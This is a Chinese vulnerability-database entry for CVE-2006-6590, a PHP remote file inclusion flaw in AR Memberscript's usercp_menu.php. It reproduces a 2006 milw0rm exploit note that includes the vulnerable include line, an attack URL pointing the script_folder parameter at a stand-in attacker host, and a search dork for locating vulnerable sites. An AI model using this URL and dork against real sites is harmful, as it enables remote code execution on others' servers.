AR Memberscript 'usercp_menu.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111773 漏洞类型 未知
发布时间 2006-12-14 更新时间 2006-12-15
CVE编号 CVE-2006-6590 CNNVD-ID CNNVD-200612-359
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2931
https://www.securityfocus.com/bid/87241
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-359
|漏洞详情
ARMemberscript的usercp_menu.php中存在PHP远程文件包含漏洞,远程攻击者可以通过script_folder参数中的URL执行任意PHP代码。
|漏洞EXP
#################################################################################################
# Author: ex0
# 
# ar_memberscript - remote file include vulnerability (all versions)
# 
# **There is no vendo patch, and doubt there will be. I havnt been able to get in touch with the
# vendor for 2 months**
# 
# ar_memberscript is a script used by many anime sites to manage their members, news, and some 
# content, in some cases "premium media".
#
# 
# Discovered: 10/22/06
# Published: 12/12/06
# 
# Enjoy it.
# 
#################################################################################################

Here is the vulnerable code:

usercp_menu.php
include ( "$script_folder/login_form2.php" );

www.someanimesite.com/member/usercp_menu.php?script_folder=http://evilsite.com

Dont take too much advantage of it :).

Dork: "Members Statistics" +"Total Members" +"Guests Online"

# Greetz; Caution, Raph13, Yeast, Xpontius and all former Inf Crew members & all XeN Members.
# IRC: irc.milw0rm.com:6667 #esk

# milw0rm.com [2006-12-14]
|受影响的产品
PHP Ar Memberscript 0
|参考资料

来源:XF
名称:armemberscript-usercp-file-include(30891)
链接:http://xforce.iss.net/xforce/xfdb/30891
来源:MILW0RM
名称:2931
链接:http://www.milw0rm.com/exploits/2931
来源:MILW0RM
名称:2931
链接:http://milw0rm.com/exploits/2931